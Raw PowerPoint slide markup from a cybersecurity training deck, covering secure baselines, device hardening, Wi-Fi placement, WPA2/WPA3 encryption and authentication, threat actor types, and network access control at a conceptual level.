              <a:t>Secure baselines, hardening, wireless security, and network access control are fundamental concepts in cybersecurity. Secure baselines establish a set of standardized security configurations for different types of IT assets, such as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>operating systems, networks, and applications. These baselines represent a starting point for security measures, offering a defined minimum level of security that all systems must meet.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Lesson Objectives</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this lesson, you will do the following:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Describe the importance of secure baselines.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Explore device hardening concepts.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Summarize wireless network design considerations.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Explain wireless security settings.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Understand network access control (NAC) capabilities.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="348830186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DC823-DDDF-EE81-FA71-5E860A792344}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2592925" y="624110"/>
            <a:ext cx="8911687" cy="671290"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Topic 9A - Network Security Baselines</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{636EC06D-B2FF-21B5-C125-91935320EA78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network security baselines describe a set of minimum security controls and configurations for a network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Benchmarks and Secure Configuration Guides</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Hardening Concepts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Switches and Routers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Server Hardware and Operating Systems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37335558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E2A1-94EE-82FF-1353-8E3D84F976F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Wireless Network Installation Considerations</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B3CA9C0-40FE-6374-A595-D331C9606CEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1257300" y="2133600"/>
            <a:ext cx="5645776" cy="3886200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Wireless network installation considerations refer to the factors that ensure good availability of authorized Wi-Fi access points. A network with patchy coverage is vulnerable to rogue and evil twin attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Wireless Access Point (WAP) Placement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Site Surveys and Heat Maps</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 684">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FAA4B88-5132-FECF-75EA-D3EB64825E08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7191375" y="1264555"/>
            <a:ext cx="4313238" cy="3234928"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 685">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1C3D47D-6D48-D8B4-26FA-183E49DD8233}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7353567" y="4501087"/>
            <a:ext cx="3390633" cy="2184716"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2115014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2E8AE-3468-2F6F-AB83-7F72C19AB376}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Bahnschrift SemiBold" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Lesson 1 – Summarize Fundamental Security Concept</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0">
              <a:latin typeface="Bahnschrift SemiBold" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44AD7C40-10FD-02BB-8001-79EEE06658EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="2142067"/>
            <a:ext cx="10705453" cy="4491208"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>LESSON INTRODUCTION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security is an ongoing process that includes assessing requirements, setting up organizational security systems, hardening and monitoring those systems, responding to attacks in progress, and deterring attackers. If you can summarize the fundamental concepts that underpin security functions, you can contribute more effectively to a security team. You must also be able to explain the importance of compliance factors and best practice frameworks in driving the selection of security controls and how departments, units, and professional roles within different types of organizations implement the security function.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Lesson Objectives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this lesson, you will do the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Summarize information security concepts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compare and contrast security control types.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Describe security roles and responsibilities. </a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2193072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85056-EA09-DABE-D8ED-F3D3D88B0803}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hackers and Hacktivists</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03889D98-3C01-C474-8E31-02D1888B3712}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Given awareness of the general strategies and motivations, it can also be helpful to evaluate the risk that well-known threat actor types or profiles pose to a business.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Hackers</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Unskilled Attackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Hacker Teams and Hacktivists</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11471730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6DAC7-6339-E73B-09D1-D8AFAFD1FF5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Wireless Encryption</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC15DCCA-B6E0-0971-A2CA-34204FFB9FAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1437840" y="1466850"/>
            <a:ext cx="5465236" cy="4444372"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The first version of Wi-Fi Protected Access (WPA) was designed to fix critical vulnerabilities in the earlier wired equivalent privacy (WEP) standard. Like WEP, version 1 of WPA uses the RC4 stream cipher but adds a mechanism called the Temporal Key Integrity Protocol (TKIP) to make it stronger.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Wi-Fi Protected Setup (WPS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Wi-Fi Protected Access 3 (WPA3)</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Weaknesses found in WPA2 led to its intended replacement by WPA3. The main features of WPA3 are as follows:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Simultaneous Authentication of Equals (SAE)</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Enhanced Open</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Updated Cryptographic Protocols</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Wi-Fi Easy Connect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 686">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C43DF65F-6D80-D581-78F9-ACF379A22D4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7941828" y="2125663"/>
            <a:ext cx="2812332" cy="3778250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="141412780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9AEE7-3EFB-19E2-969C-539BC45625F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Wi-Fi Authentication Methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16D8DCF5-A409-6617-2217-7739BD368514}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In order to secure a network, you must confirm that only valid users are connecting to it. Wi-Fi authentication comes in three types: personal, open, and enterprise.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Within the personal category, there are two methods: pre-shared key authentication (PSK) and simultaneous authentication of equals (SAE).</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>WPA2 Pre-Shared Key Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>WPA3 Personal Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Advanced Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Remote Authentication Dial-In User Service (RADIUS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="248962914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E13D5-0F07-2052-ED17-2A7B86D4D3F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="-7517"/>
            <a:ext cx="10131425" cy="1456267"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Network Access Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F321E49-5E41-DEDF-626B-DB5D36A9C498}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685802" y="1205345"/>
            <a:ext cx="4995334" cy="4585856"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network access control (NAC) not only authenticates users and devices before allowing them access to the network but also checks and enforces compliance with established security policies. By evaluating the operating system version, patch level, antivirus status, or the presence of specific security software, NAC ensures that devices meet a minimum set of security standards before being granted network access. NAC also can restrict access based on user profile, device type, location, and other attributes, to ensure users and devices can only access the resources necessary to complete their duties. NAC plays a crucial role in identifying and quarantining suspicious or noncompliant devices. For organizations with bring-your-own-device (BYOD) policies and increasing use of IoT devices, NAC helps organizations secure their internal network environment against unauthorized access.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Agent vs. Agentless Configurations</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An agent can be persistent, in which case it is installed as a software application on the client, or nonpersistent. A nonpersistent (or dissolvable) agent is loaded into memory during posture assessment but is not installed on the device.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 690">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{654449C2-4BB8-477F-579B-F69835DE55EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7066492" y="193697"/>
            <a:ext cx="3750734" cy="2510106"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 691">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE3BB119-0BA4-3E48-AC1F-7270C524CAAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7066491" y="2905017"/>
